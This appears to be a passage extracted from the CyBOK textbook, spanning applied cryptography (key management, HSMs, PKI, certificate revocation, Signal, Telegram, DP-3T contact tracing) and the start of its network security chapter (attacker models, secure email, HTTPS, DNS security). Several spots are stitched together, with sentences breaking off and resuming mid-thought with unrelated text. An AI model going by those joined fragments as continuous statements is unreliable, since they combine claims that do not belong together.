Then keys are actually used to protect data in some way. It may be necessary to impose limits
on how much data the keys are used to protect, due to intrinsic limitations of the cryptographic
scheme in which they are being used. Keys may then need to be changed or updated. For
example, the TLS specification in its latest version, TLS 1.3 [1480], contains recommendations
about how much data each AEAD key in the protocol can be used to protect. These are set
by analysing the security bounds for the employed AEAD schemes. TLS also features a key
update sub-protocol enabling new keys to be established within a secure connection.
Keys may need to be revoked if they are discovered to have been compromised. The revocation
status of keys must then be communicated to parties relying on those keys in a timely and
reliable manner.
Keys may also need to be archived — put into long-term, secure storage — enabling the data
they protect to be retrieved when needed. This may involve encrypting the keys under other
keys, which themselves require management. Finally, keys should be securely deleted at the
end of their lifetime. This may involve physical destruction of storage media, or carefully
overwriting keys.
Given the complexity in the key life-cycle, it should be apparent that the key life-cycle and its
attendant processes need to be carefully considered and documented as part of the design
process for any system making use of cryptography.
We have already hinted that keys in general need to remain secret in order to be useful (public
keys are an exception; as we discuss below, the requirement for public keys is that they be
securely bound to identity of the key owner and their function). Keys can leak in many ways —
through the key generation procedure due to poor randomness, whilst being transported to
the place where they will be needed, through compromise of the storage system on which they
reside, through side-channel attacks while in use, or because they are not properly deleted once
exhausted. So it may be profitable for attackers to directly target keys and their management
rather than the algorithms making use of them when trying to break a cryptographic system.
Additionally, it is good practice that keys come with what Martin [1620] calls assurance of
purpose — which party (or parties) can use the key, for which purposes and with what limits.
Certain storage formats — for example, digital certificates — encode this information along
with the keys. This relates to the principle of key separation which states that a given key
should only ever be used for one purpose (or in one cryptographic algorithm). This principle is
perhaps more often broken than observed and has led to vulnerabilities in deployed systems,
see, for example [1667, 1698].
the HSM offers to keys that it directly stores to a larger collection of keys. Consider the simple
case of using the HSM to store a Key Encryption Key (KEK), such that the HSM’s API allows
that key to be used internally for authorised encryption and decryption functions. Then the
HSM can be used to wrap and, when needed, unwrap many Data Encryption Keys (DEKs) using
a single KEK that is stored inside the HSM. Here wrapping means encrypting and unwrapping
means decrypting. Assuming the used encryption mechanism is strong, the wrapped DEKs
can be stored in general, unprotected memory. Further details on HSMs can be found in the
Hardware Security Knowledge Area (Chapter 20).
TPMs also provide hardware-backed key storage. Technologies aiming to provide secure
execution environments, such as Intel SGX and ARM Trustzone, enable secure storage of
keys but also possess much more general capabilities. On mobile devices, the Android and
iOS operating systems offer similar key storage features through Android Keystore and iOS
Secure Enclave — both of these are essentially mini-HSMs.
to transport session keys, Diffie-Hellman key exchange achieves strictly stronger forward
security properties.
Complementing forward security is the notion of backward security, aka post compromise,
security [1706]. This refers to the security of keys established after a key compromise has
occurred. Using Diffie-Hellman key exchange can help here too, to establish fresh session
keys, but only in the event that the adversary is restricted to being passive for at least one run
of the Diffie-Hellman protocol.
A suitable mechanism to bind public keys and identities — and possibly other information —
is needed. In early proposals for deploying Public Key Cryptography, it was proposed that this
could take the form of a trusted bulletin board, where all the public keys and corresponding
identities are simply listed. But this of course requires trust in the provider of the bulletin board
service.
A non-scalable and inflexible solution, but one that is commonly used in mobile applications
and IoT deployments, is to hard-code the required public key into the software of the party that
needs to use the public key. Here, security rests on the inability of an adversary to change the
public key by over-writing it in a local copy of the software, substituting it during a software
update, changing it in the code repository of the software provider, or by other means.
Another solution is to use public key digital certificates (or just certificates for short). These
are data objects in which the data includes identity, public key, algorithm type, issuance and
expiry dates, key usage restrictions and potentially other fields. In addition, the certificate
contains a digital signature, over all the other fields, of some Trusted Third Party (TTP) who
attests to the correctness of the information. This TTP is known as a Certification Authority
(CA). The most commonly used format for digital certificates is X.509 version 3 [1707].
The use of certificates moves the problem of verifying the binding implied by the digital
signature in the certificate to the authentic distribution of the CA’s public key. In practice, the
security issues this can introduce, but not for the elliptic curve setting.
problem may be deferred several times via a certificate chain, with each TTP’s public key in
the chain being attested to via a certificate issued by a higher authority. Ultimately, this chain
is terminated at the highest level by a root certificate that is self-signed by a root CA. That is,
the root certificate contains the public verification key of the root CA and a signature that is
created using the matching private signing key. A party wishing to make use of a user-level
public key (called a relying party) must now verify a chain of certificates back to the root and
also have means of assuring that the root public key is valid. This last step is usually solved
by an out of band distribution of the root CA’s public key. Root CAs may also cross-sign each
other’s root certificates.
As an important and visible example of a PKI, consider the Web PKI. Web browser vendors
embed a list of the public keys of a few hundred different root CAs in their software and
update the list from time to time via their software update mechanisms, which in turn may
rely for its security on a separate PKI. Website owners pay to obtain certificates binding their
sites’ URLs to their public keys from subordinate CAs. Then, when running the TLS protocol
for secure communications between a web browser and a website, the website’s server sends
a certificate chain to the web browser client. The chain provides the web browser with a
copy of the server’s public key (in the lowest certificate from the chain, the leaf or end-entity
certificate) as well as a means of verifying the binding between the web site name in the form
of its URL, and that public key. The operations and conventions of the Web PKI are managed
by the CA/Browser Forum.28
In addition to needing a suitable binding mechanism, there must be a stable, controlled naming
mechanism for parties. Moreover, parties need to have means of proving to CAs that they own
a specific identity and CAs need to check such assertions. Equally, CAs need to be trusted
to only issue certificates to the correct parties. This aspect of PKI intersects heavily with
legal and regulatory aspects of Information Security and is covered in more detail in Law &
Regulation Knowledge Area (Section 3.10.3).
For the Web PKI, there have been numerous incidents where CAs were found to have mis-
issued certificates, either because they were hacked (e.g. DigiNotar29 ), because of poor
control over the issuance process (e.g. TurkTrust30 ), or because they were under the control
of governments who wished to gain surveillance capabilities over their citizens. This can lead
to significant commercial impacts for affected CAs: in DigiNotar’s case, the company went
bankrupt. In other cases, CAs were found to not be properly protecting their private signing
keys, leaving them vulnerable to hacking.31 In response to a growing number of such incidents,
Google launched the Certificate Transparency (CT) effort. CT provides an open framework for
monitoring and auditing certificates; it makes use of multiple, independent public logs in an
attempt to record all the certificates issued by browser-trusted CAs. The protocols and data
formats underlying CT are specified in [1708].32
Relying parties (i.e. parties verifying certificates and then using the embedded public keys)
need access to reliable time sources to be sure that the certificate’s lifetime, as encoded in
28
See https://cabforum.org/.
29
See https://en.wikipedia.org/wiki/DigiNotar.
30
See https://nakedsecurity.sophos.com/2013/01/08/the-turktrust-ssl-certificate-fiasco-what-happened-and-what-
happens-next/.
31
See for example the case of CNNIC, https://techcrunch.com/2015/04/01/google-cnnic/.
32
See also https://certificate.transparency.dev/ for the project homepage.
the certificate, is still valid. Otherwise, an attacker could send an expired certificate for which
it has compromised the corresponding private key to a relying party and get the relying party
to use the certificate’s public key. This requirement can be difficult to fulfill in low-cost or
constrained environments, e.g. IoT applications.
Relying parties verifying certificates also need access to reliable, timely sources of information
about the status of certificates — whether the certificate is still valid or has been revoked for
some security or operational reason. This can be done by regularly sending lists of revoked
certificates to relying parties (known as Certificate Revocation Lists, CRLs), or having the
relying parties perform a real-time status check with the issuing CA before using the public
key using the Online Certificate Status Protocol, OCSP [1709]. The former approach is more
private for relying parties, since the check can be done locally, but implies the existence of a
window of exposure for relying parties between the time of revocation and the time of CRL
distribution. The latter approach provides more timely information but implies that large CAs
issuing many certificates need to provide significant bandwidth and computation to serve the
online requests.
In the web context, OCSP has become the dominant method for checking revocation status of
certificates. OCSP’s bandwidth issue is ameliorated by the practice of OCSP stapling, wherein
a web server providing a certificate regularly performs its own OCSP check and includes
the certified response from its CA along with its certificate. In an effort to further improve
user privacy, in 2020, Mozilla experimentally deployed33 an approach called CRLite developed
in [1710] in their Firefox browser. CRLite uses CT logs and other sources of information to
create timely and compact CRLs for regular distribution to web browsers.
The software at a relying party that validates certificate chains needs to work properly. This
is non-trivial, given the complexity of the X.509 data structures involved, the use of complex
encoding languages and the need to accurately translate security policy into running code.
There have been numerous failures. A prominent and entirely avoidable example is Apple’s
“goto fail” from 2014. Here a repeated line of code34 for error handling in Apple’s certificate
verification code in its SSL/TLS implementation caused all certificate checking to be bypassed.
This made it trivial to spoof a web server’s public key in a fake certificate to clients running
Apple’s code. This resulted in a total bypass of the server authentication in Apple’s SSL/TLS
implementation, undermining all security guarantees of the protocol.35
The certificate industry has been slow to react to advances in the cryptanalysis of algorithms
and slow to add support for new signature schemes. The story of SHA-1 and its gradual
removal from the Web PKI is a prime example. This relates to the discussion of cryptographic
agility in Section 18.1.14. The first cracks in SHA-1 appeared in 2005 [1711]. Already at this
point, cryptographers taking their standard conservative approach, recommended that SHA-1
be deprecated in applications requiring collision resistance. From 2005 onwards, the crypt-
analysis of SHA-1 was refined and improved. Finally in 2017, the first public collisions for
33
See https://blog.mozilla.org/security/2020/01/09/crlite-part-1-all-web-pki-revocations-compressed/.
34
The offending line of code was literally “goto fail”.
35
See https://dwheeler.com/essays/apple-goto-fail.html for a detailed write-up of the incident and its implications
for Apple’s software development processes.
SHA-1 were exhibited [1712]. This was followed in 2019 by a chosen-prefix collision attack
that directly threatened the application of SHA-1 in certificates [1713]. However, despite the
direction of travel having been clear for more than a decade, it took until 2017 before the
major web browsers finally stopped accepting SHA-1 in Web PKI certificates. Today, SHA-1
certificates are still to be found in payment systems and elsewhere. The organisations run-
ning these systems are inherently change-averse because they have to manage complex
systems that must continue to work across algorithm and technology changes. In short, these
organisations are not cryptographically agile, as discussed in Section 18.1.14.
The web of trust is an alternative to hierarchical PKIs in which the users in a system vouch for
the authenticity of one another’s public keys by essentially cross-certifying each other’s keys.
It was once popular in the PGP community but did not catch on elsewhere. Such a system
poses significant usability challenges for ordinary users [347].
Identity-Based Cryptography (IBC) [1714] offers a technically appealing alternative to traditional
Public Key Cryptography in which users’ private keys are derived directly from their identities
by a TTP called the Trusted Authority (TA) in possession of a master private key. The benefit
is that there is no need to distribute public keys; a relying party now needs only to know an
identity and have an authentic copy of the TA’s public key. The down-side for many applica-
tion domains is that trust in the TA is paramount, since it has the capability to forge users’
signatures and decrypt ciphertexts intended for them through holding the master private
key. On the other hand, IBC’s built-in key escrow property may be useful in corporate security
applications. Certificateless Cryptography [1715] tries to strike a balance between traditional
PKI and IBC. These and other related concepts have sparked a lot of scientific endeavour, but
little deployment to date.
and showing that it is visually scrambled by the algorithm. (Of course, image data is ultimately
represented by bits and standard cryptographic algorithms operate on those bits.) Other topics
common in such papers are chaos-based cryptography and combining multiple schemes
(RSA, ElGamal, etc) to make a stronger one. The activity of generating such papers is a waste
of time for the authors and reviewers alike, while it misleads students involved in writing the
papers about the true nature of cryptography as a research topic.
This author has seen multiple examples where complete outsiders to the field have been
persuaded to invest in cryptographic technologies which either defy the laws of information
theory or which fall to the “kitchen sink” fallacy of cryptographic design — push the data
through enough complicated steps and it must be secure. Another classic design error is for
an inventor to fall under the spell of the “large keys” fallacy: if an algorithm has a very large
key space, then surely it must be secure? Certainly a large enough key space is necessary
for security, but it is far from sufficient. A third fallacy is that of “friendly cryptanalysis”: the
inventor has tried to break the new algorithm themselves, so it must be secure. There is no
substitute for independent analysis.
Usually these technologies are invented by outsiders to the field. They may have received
encouragement from someone who is a consumer of cryptography but not themselves an
expert or someone who is too polite to deliver a merciful blow. Significant effort may be
required to dissuade the original inventors and their backers from taking the technology
further. A sometimes useful argument to deploy in such cases is that, while the inventor’s
idea may or may not be secure, we already have available standardised, carefully-vetted,
widely-deployed, low-cost solutions to the problem and so it will be hard to commercialise the
invention in a heavily commoditised area.
Another set of issues arise when software developers, perhaps with the best of intentions and
under release deadline pressure, “roll their own crypto”. Maybe having taken an introductory
course in Information Security or Cryptography at Bachelor’s level, they have accrued enough
knowledge not to try to make their own low-level algorithms and they know they can use
an API to a cryptographic library to get access to basic encryption and signing functions.
However, with today’s cryptographic libraries, it is easy to accidentally misuse the API and
end up with an insecure system. Likely the developer wants to do something more complex
than simply encrypting some plaintext data, but instead needs to plug together a collection of
cryptographic primitives to do something more complex. This can lead to the “kitchen sink”
fallacy at the system level. Then there is the question of how the developer’s code should deal
with key management — recall that cryptographic schemes only shift the problem of securing
data to that of securing keys. Unfortunately, key management is rarely taught to Bachelor’s
students as a first class issue and this author has seen that basic issues like hard-coded keys
are still found on a regular basis in deployed cryptographic software.
Apple’s iMessage system historically used an ad hoc signcryption scheme that was shown to
have significant vulnerabilities in [1727]. This was despite signcryption being a well-known
primitive with well-established models, generic constructions from PKE and digital signatures
and security proofs in the academic literature. Conjecturally, the designers of Apple’s scheme
were constrained by the functions available in their cryptographic library. The Apple system
relied fully on trust in Apple’s servers to distribute authentic copies of users’ public keys — a
PKI by fiat. The system was designed to be end-to-end secure, meaning that without active
impersonation via key substitution, Apple could not read users’ messages. It did not enjoy
any forward-security properties, however: once a user’s private decryption key was known, all
messages intended for that user could be read. Note that Apple’s iMessage implementation
is not open source; the above description is based on the reverse engineering carried out
in [1727] and so may no longer be accurate.
18.5.2.2 Signal
The Signal design, which is used in both Signal and WhatsApp, takes a slightly different ap-
proach in the two-party case. It uses a kind of asynchronous DHKE approach called ratcheting.
At a high level, every time Alice sends user Bob a new message, she also includes a Diffie-
Hellman (DH) value and updates her symmetric key to one derived from that DH value and the
DH value she most recently received from Bob. On receipt, Bob combines the incoming DH
value with the one he previously sent to make a new symmetric key on his side. This key is
called a chaining key.
For each message that Alice sends to Bob without receiving a reply from Bob, she derives
two new keys from the current chaining key by applying a KDF (based on HKDF) to it; one key
is used as the next chaining key, the other is used to encrypt the current message. This is
also called ratcheting by the Signal designers and the combination of ratcheting applied to
both DH values and symmetric keys is called double ratcheting.40 This mechanism provides
forward security for Signal messages, despite its asynchronous nature. It also provides post
compromise security. The use of ratcheting, however, entails problems with synchronisation:
40
See https://signal.org/docs/specifications/doubleratchet/ for a concise overview of the process.
if a message is lost between Alice and Bob, then their keys will end up in different states. This
is solved by keeping caches of recent chaining keys.
For symmetric encryption, Signal uses a simple generic AE construction based on EtM relying
on CBC mode using AES with 256 bit keys for the “E” component and HMAC with SHA-256 for
the “M” component. This is a conservative and well-understood design.
Authentication in Signal is ultimately the same as in iMessage: it depends on trust in the server.
The idea is that users register a collection of DH values at the server; these are fetched by other
users and used to establish initial chaining keys. However, a malicious server could replace
these values and thereby mount a MitM attack. The use of human-readable key fingerprints
provides mitigation against this attack.
A formal security analysis of the double ratcheting process used by Signal can be found
in [444]. Note that, in order to tame complexity, this analysis does not treat the composition of
the double ratchet with the symmetric encryption component. The Signal design has spurred a
spate of recent research into the question of what is the best possible security one can achieve
in two-party messaging protocols and how that security interacts with the synchronisation
issues.
18.5.2.3 Telegram
A third design is that used by Telegram.41 It is notable for the way it combines various crypto-
graphic primitives (RSA, finite field DHKE, a hash-based key derivation function, a hash-based
MAC and a non-standard encryption mode called IGE). Moreover, it does not have proper
key separation: keys used to protect messages from Alice to Bob share many overlapping
bits with keys used in the opposite direction; moreover those key bits are taken directly from
“raw” DHKE values. These features present significant barriers to formal analysis and violate
cryptographic best practices. Furthermore, Telegram does not universally feature end-to-end
encryption; rather it has two modes, one of which is end-to-end secure, the other of which
provides secure communications only from each client to the server. The latter seems to
be much more commonly used in practice, but is of course subject to interception. This
is concerning, given that Telegram is frequently used by higher-risk users in undemocratic
countries.
to generate, using a pseudo-random generator built from AES in CTR mode, a sequence of 96
short pseudo-random strings called beacons. At each 15-minute time interval during the day,
the next beacon from the sequence is selected and broadcast using BLE. Other phones in the
vicinity pick up and record the beacon-carrying BLE signals and store them in a log along with
metadata (time of day, received signal strength). Notice that the beacons are indistinguishable
from random strings, under the assumption that AES is a good block cipher.
When a user of the system receives a positive COVID-19 test, they instruct their phone to upload
the recent day keys to a central server, possibly along with sent signal strength information.44
All phones in the system regularly poll the server for the latest sets of day keys, use them to
regenerate beacons and look in their local logs to test if at some point they came into range of
a phone carried by a person later found to be infected. Using sent and received signal strength
information in combination with the number and closeness (over time) of matching beacons,
the phone can compute a risk score. If the score is above a threshold, then the phone user can
be instructed to get a COVID-19 test themselves. Setting the threshold in practice to balance
false positives against false negatives is a delicate exercise made more difficult by the fact
that BLE permits only inaccurate range estimation.
Notice that the central server in DP-3T stores only day keys released from phones by infected
parties. The central server is not capable of computing which users were in proximity to which
other users, nor even the identity of users who uploaded keys (though this information will
become visible to the health authority because of the issuance of authorisation codes). All
the comparison of beacons and risk computations are carried out on users’ phones. One
can contend that a fully centralised system could provide more detailed epidemiological
information — some epidemiologists unsurprisingly made this argument. On the other hand,
the strict purpose of the DP-3T system was to enable automated contact tracing, not to provide
an epidemiological research tool. A more detailed privacy analysis of DP-3T can be found
in [1718].
The DP-3T design was produced, analysed, prototyped and deployed under test conditions all
in the space of a few weeks. After adoption and adaptation by Google and Apple, it made its
way into national contact tracing apps within a few months. Given the pace of development,
simplicity of the core design was key. Only “off the shelf” cryptographic techniques available
in standard cryptographic libraries could be used. Given the likely scaling properties of the
system (possibly tens of millions of users per country) and the constraints of BLE message
sizes, using Public Key Cryptography was not an option; only symmetric techniques could
be countenanced. Many follow-up research papers have proposed enhanced designs using
more complex cryptographic techniques. The DP-3T team did not have this luxury and instead
stayed resolutely pragmatic in designing a system that balances privacy, functionality and
ease of deployment, and that resists repurposing.
44
To prevent spurious uploads, the day keys can only be uploaded after entering an authorisation code issued
by the local health authority into the app.
• Another growth area for applied cryptography is in privacy-preserving techniques for data-
mining and data aggregation. Google’s privacy-preserving advertising framework [1729]
provides one prominent example. Another is the Prio system [461] that allows privacy-
preserving collection of telemetry data from web browsers. Prio has been experimentally
deployed in Mozilla’s Firefox browser.46
• Electronic voting (e-voting) has long been touted as an application area for cryptography.
There is a large scientific literature on the problem. However, the use of e-voting in
local and national elections has proved problematic, with confidence-sapping security
vulnerabilities having been found in voting software and hardware. For example, a recent
Swiss attempt to develop e-voting was temporarily abandoned after severe flaws were
found in some of the cryptographic protocols used in the system during a semi-open
system audit [1730]. The Estonian experience has been much more positive, with a
system built on Estonia’s electronic identity cards having been in regular use (and having
seen regular upgrades) since 2005. Key aspects of the Estonian success are openness,
usability and the population’s broad acceptance of and comfort with online activity.
• We may see a shift in how cryptography gets researched, developed and then deployed.
The traditional model is the long road from research to real-world use. Ideas like MPC
have been travelling down this road for decades. Out of sheer necessity, systems like DP-
3T have travelled down the road much more quickly. A second model arises when practice
gets ahead of theory and new theory is eventually developed to analyse what is being
done in practice; often this leads to a situation where the practice could be improved by
following the new theory, but the improvements are slow in coming because of the drag
of legacy code and the difficulty of upgrading systems in operation. Sometimes a good
attack is needed to stimulate change. A third model is represented by TLS 1.3: academia
and industry working together to develop a complex protocol over a period of years.
• Cryptography involves a particular style of thinking. It involves quantifying over all adver-
saries in security proofs (and not just considering particular adversarial strategies), being
conservative in one’s assumptions, and rejecting systems even if they only have “certifi-
cational flaws”. Such adversarial thinking should be more broadly applied in security
research. Attacks on machine learning systems are a good place where this cross-over
is already bearing fruit.
Topics Cites
18.1 Algorithms, Schemes and Protocols [963, 1619, 1620]
18.2 Cryptographic Implementation [405, 1453, 1637, 1677]
18.3 Key Management [1620, 1666, 1696, 1697]
18.4 Consuming Cryptography
18.5 Applied Cryptography in Action [444, 1480, 1718]
18.6 The Future of Applied Cryptography
46
See https://blog.mozilla.org/security/2019/06/06/next-steps-in-privacy-preserving-telemetry-with-prio/.
645
The Cyber Security Body Of Knowledge
www.cybok.org
INTRODUCTION
The ubiquity of networking allows us to connect all sorts of devices and gain unprecedented
access to a whole range of applications and services anytime, anywhere. However, our heavy
reliance on networking technology also makes it an attractive target for malicious users who
are willing to compromise the security of our communications and/or cause disruption to
services that are critical for our day-to-day survival in a connected world. In this chapter, we
will explain the challenges associated with securing a network under a variety of attacks for a
number of networking technologies and widely used security protocols, along with emerging
security challenges and solutions. This chapter aims to provide the necessary background in
order to understand other knowledge areas, in particular the Security Operations & Incident
Management Knowledge Area (Chapter 8) which takes a more holistic view of security and
deals with operational aspects. An understanding of the basic networking protocol stack
and popular network protocols is assumed. Standard networking text books explain the
fundamentals of the layered Internet Protocol suite [1731, 1732].
This chapter is organized as follows. In Section 19.1, we lay out the foundations of this chapter
and define security goals in networked systems. As part of this, we also outline attackers and
their capabilities that threaten these goals. In Section 19.2, we describe six typical networking
scenarios that nicely illustrate why security in networking is important, and achieving it can be
non-trivial. We then discuss the security of the various networking protocols in Section 19.3,
structured by the layered architecture of the Internet protocol stack. In Section 19.4, we
present and discuss several orthogonal network security tools such as firewalls, monitoring
and Software Defined Networking (SDN). We complete this chapter with a discussion on how
to combine the presented mechanisms in Section 19.5.
CONTENT
availability ensures that data and services should be accessible by their designated users all
the time. In our email scenario, a Denial of Service (DoS) attacker may aim to threaten the
availability of email servers in order to prevent or delay email communication.
Next to the CIA triad, there are more subtle security goals, not all of which apply in each and
every application scenario. Authenticity is ensured if the recipient can reliably attribute the
origin of communication to the sender. For example, an email is authentic if the recipient can
ensure that the claimed sender actually sent this email. Non-repudiation extends authenticity
such that we can prove authenticity to arbitrary third parties, i.e., allowing for public verification.
In our email scenario, non-repudiation allows the email recipient to prove to anyone else that
a given email stems from a given sender. Anonymity means that communication cannot
be traced back to its sender (sender anonymity) and/or recipient (recipient anonymity). For
example, if an attacker sends a spoofed email that cannot be reliably traced back to its actual
sender (e.g., the correct personal identity of the attacker), it is anonymous. There are further
privacy-related guarantees such as unlinkability that go beyond the scope of this chapter and
are defined in the Privacy & Online Rights Knowledge Area (Chapter 5).
To achieve security goals, we will heavily rely on cryptographic techniques such as public and
symmetric keys for encryption and signing, block and stream ciphers, hashing, and digital
signature, as described in the Cryptography Knowledge Area (Chapter 10) and the Applied
Cryptography Knowledge Area (Chapter 10). Before showing how we can use these techniques
for secure networking, though, we will discuss attacker models that identify capabilities of
possible attackers of a networked system.
suspected TCP connection between two parties. Similarly, off-path attackers could abuse high-
bandwidth links and forge Internet Protocol (IP) headers (IP spoofing, see Section 19.3.2.4)
to launch powerful and anonymous Denial of Service (DoS) attacks. Using forged routing
protocol message, off-path attackers may even try to become on-path attackers.
In addition, the position of attackers heavily influences their power. Clearly, a single Internet
user has less power than an entire rogue Internet Service Provider (ISP). The single user can
leverage their relatively small bandwidth to launch attacks, while an ISP can generally also sniff
on and alter communication, abuse much larger bandwidths, and correlate traffic patterns.
Then again, as soon as attackers aggregate the power of many single users/devices (e.g., in
form of a botnet), their overall power amplifies. Attackers could also be in control of certain
Internet services, routers, or any combination thereof. We also distinguish between insider
and outsider attackers, which are either inside or outside of a trusted domain, respectively.
Overall, we model (i) where attackers can be positioned, (ii) who they are, and (iii) which capa-
bilities they have. Unfortunately, in strong adversarial settings, security guarantees diminish
way too easily. For example, strong anonymity may not hold against state actors who can
(theoretically) control major parts of the Internet, such as Tier-1. Similarly, availability is hard
to maintain for spontaneous and widely distributed DoS incidents.
Consequently, even though a LAN is conceptually simple, we still have uncertainties regarding
LAN security: Can we control which devices become part of a network to exclude untrusted
clients and/or device configurations? (Sections 19.3.4.1 and 19.4.5) Can we monitor their
actions to identify attackers and hold them accountable? (Section 19.4.3) Can we partition
larger local networks into multiple isolated partitions to mitigate potential damage? (Sec-
tion 19.3.4.5)
Software Defined Networking (SDN) is our final use case. SDN is strictly speaking not a
networking application, but more of a technology to enable for dynamic and efficient network
configuration. Yet it concerns similarly many security implications as other applications do.
SDN aims to ease network management by decoupling packet forwarding (data plane) and
packet routing (control plane). This separation and the underlying flow handling have enabled
for drastic improvements from a network management perspective, especially in highly-
dynamic environments such as data centers. The concept of Network Functions Virtualisation
(NFV) complements SDN, and allows to virtualize network node functions such as load
balancers or firewalls.
We will revisit SDN by discussing the following questions: How can SDN help in network
designs and better monitoring? Can NFV help securing networks by virtualizing security
functions? Are there new, SDN-specific threats? (Section 19.4.4)
Server
Client
Communication
Network
After having introduced several networking applications, we now turn to the security of net-
working protocols. To guide this discussion, we stick to a layered architecture that categorizes
protocols and applications. Indeed, a complex system such as distributed applications run-
ning over a range of networking technologies is best understood when viewed as layered
architecture. Figure 19.1 shows the 4-layer Internet protocol suite and the interaction between
the various layers. For each layer, we know several network protocols—some of which are
quite generic, and others that are tailored for certain network architectures. The Internet is
the predominant architecture today, and nicely maps to the TCP/IP model. It uses the Internet
Protocol (IP) (and others) at the Internet layer, and UDP/TCP (and others) at the transport
layer—hence, the Internet protocol suite is also known as the TCP/IP stack.
Other networking architectures such as automotive networks use completely different sets of
protocols. Not always it is possible to directly map their protocol to the layered architecture of
the TCP/IP model. Consequently, more fine-grained abstractions such as the ISO/OSI model
extend this layered architecture. For example, the ISO/OSI model splits the link layer into two
parts, namely the data link layer (node-to-node data transfer) and the physical layer (physical
transmission and reception of raw data). The ISO/OSI model defines a network layer instead
of an Internet layer, which is more inclusive to networks that are not connected to the Internet.
Finally, ISO/OSI defines two layers below the application layer (presentation and session).
The vast majority of topics covered in this chapter do not need the full complexity of the
ISO/OSI model. In the following, we therefore describe the security issues and according
countermeasures at each layer of the TCP/IP model. We thereby follow a top-down approach,
starting with application-layer protocols, and slowly going down to the lower layers until the
link layer. Whenever possible, we abstract from the protocol specifics, as many discussed
network security principles can be generically applied to other protocols.
As a first example of an application-layer security protocol, we will look at secure email. Given
its age, the protocol for exchanging emails, Simple Mail Transfer Protocol (SMTP), was not
designed with security in mind. Still, businesses use email even now. Communication parties
typically want to prevent others from reading (confidentiality) or altering (integrity) their emails.
Furthermore, they want to verify the sender’s identity when reading an email (authenticity).
Schemes like Pretty Good Privacy (PGP) and Secure Multipurpose Internet Mail Extensions
(SMIME) provide such end-to-end security for email communication. Their basic idea is that
each email user has their own private/public key pair–see the Cryptography Knowledge Area
(Chapter 10) for the cryptographic details, and Section 19.3.2.2 for a discussion how this key
material can be shared. The sender signs the hash of a message using the sender’s private key,
and sends the hash along with the (email) message to the recipient. The recipient can then
validate the email’s signature using the sender’s public key. Checking this signature allows for
an integrity check and authentication at the same time, as only the sender knows their private
key. Furthermore, this scheme provides non-repudiation as it can be publicly proved that the
hash (i.e., the message) was signed by the sender’s private key. To gain confidentiality, the
sender encrypts the email before submission using “hybrid encryption”. That is, the sender
creates a fresh symmetric key used for message encryption, which is significantly faster than
using asymmetric cryptography. The sender then shares this symmetric key with the recipient,
encrypted under the recipient’s public key.
This very same scheme can be applied to other client-to-client communication. For example,
instant messengers (e.g., WhatsApp, Threema or Signal) or video conference systems can use
this general principle to achieve the same end-to-end guarantees. One remaining challenge
for such strong guarantees to hold is that user identities (actually, their corresponding key
material) have to be reliably validated [1739]. The Applied Cryptography Knowledge Area
(Chapter 18) has more details.
Not all email users leverage such client-to-client security schemes, though. Both PGP and
SMIME have usability challenges (e.g., key distribution, difficulty of indexed searches, etc.) that
hamper wide adoption [347]. To address this issue, we can secure mail protocols (SMTP, but
also Internet Message Access Protocol (IMAP) and Post Office Protocol (POP)) with the help
of TLS (see Section 19.3.2.1). By wrapping them in TLS, we at least achieve hop-by-hop security,
e.g., between client and their mail submission server or between mail servers during email
transfer. Consequently, we can protect email submission, retrieval and transport from on-path
adversaries. However, even though communication is protected hop-by-hop, curious mail
server operators can see emails in plain. Only end-to-end security schemes like PGP/SMIME
protect against untrusted mail server operators.
There are other challenges to secure email, such as phishing and spam detection, which are
described in depth in the Adversarial Behaviours Knowledge Area (Chapter 7).
The most prominent application-layer protocol, the Hypertext Transfer Protocol (HTTP), was
designed without any security considerations. Yet, the popularity of HTTP and its unprece-
dented adoption for e-commerce imposed strict security requirements on HTTP later on.
Its secure counterpart HTTPS wraps HTTP using a security protocol at the transport layer
(TLS, see Section 19.3.2.1), which can be used to provide confidentiality and integrity for the
entire HTTP communication—including URL, content, forms and cookies. Furthermore, HTTPS
allows clients to implicitly authenticate web servers using certificates. HTTPS is described in
much greater detail in the Web & Mobile Security Knowledge Area (Chapter 16).
In its primary use case, the Domain Name System (DNS) translates host names to their
corresponding IP addresses. A hierarchy of authoritative name servers (NSs) maintain this
mapping. Resolving NSs (resolvers) iteratively look up domain names on behalf of clients. In
such an iterative lookup, the resolver would first query the root NSs, which then redirect the
resolver to NSs lower in the DNS hierarchy, until the resolver contacts an NS that is authoritative
for the queried domain. For example, in a lookup for a domain sub.example.com, a root
NS would redirect the resolver to a NS that is authoritative for the .com zone, which in turn
tell the resolver to contact the NS authoritative for *.example.com. To speed up these
lookups, resolvers cache DNS records according to a lifetime determined by their authoritative
NSs. To minimize privacy leaks towards NSs in the upper hierarchy, resolvers can minimize
query names such that NSs higher up in the hierarchy do not learn the fully-qualified query
name [1740].
Unfortunately, multiple attacks aim to abuse the lack of authentication in plain text DNS. A
PITM attacker can impersonate a resolver, return bogus DNS records and divert traffic to a
malicious server, thus allowing them to collect user passwords and other credentials. In a DNS
cache poisoning attack, adversaries aim to implant bogus name records, thus diverting a user’s
traffic towards the target domain to attacker-controlled servers. Learning from these attacks,
the IETF introduced the DNS Security Extensions (DNSSEC). DNSSEC allows authoritative
name servers to sign DNS records using their private key. The authenticity of the DNS records
can be verified by a requester using the corresponding public key. In addition, a digital signature
provides integrity for the response data. The overall deployment of DNSSEC at the top-level
domain root name servers—a fundamental requirement to deploy DNSSEC at lower levels in
the near future—steadily increases [1741].
DNSSEC explicitly does not aim to provide confidentiality, i.e., DNS records are still communi-
cated unencrypted. DNS over TLS (DoT) and DNS over HTTPS (DoH) address this problem.
They provide end-to-end security between the DNS client and its chosen resolver, by tunneling
DNS via secure channels, namely TLS (see Section 19.3.2.1) or HTTPS (see Section 19.3.1.2),
respectively. More and more popular Web browsers (e.g., Chrome, Firefox) enable DoH by
default, using selected resolvers preconfigured by the browser vendors. This resulted in a
massive centralization of DNS traffic towards just a few resolvers received. Such a centraliza-
tion puts resolvers in a quite unique position with the power of linking individual clients (by
IP addresses) to their lookups. Oblivious DNS Over HTTPS (ODoH) addresses this issue by
adding trusted proxies between DNS clients and their chosen resolvers [1742].
Irrespective of these security protocols, resolvers are in a unique situation to monitor name
resolutions of their clients. Resolver operators can leverage this in order to protect clients by
offering some sort of blocklist of known “misbehaving” domains which have a bad reputation.
Such DNS filtering has the potential to mitigate cyber threats, e.g., by blocking phishing
domains or command & control domains of known malware variants.
Finally, DNS is prone to Distributed Denial of Service (DDoS) attacks [1743]. DNS authoritative
servers can be targeted by NXDOMAIN attacks, in which an IP-spoofing client looks up many
unassigned subdomains of a target domain at public (open) resolvers. Subdomains are
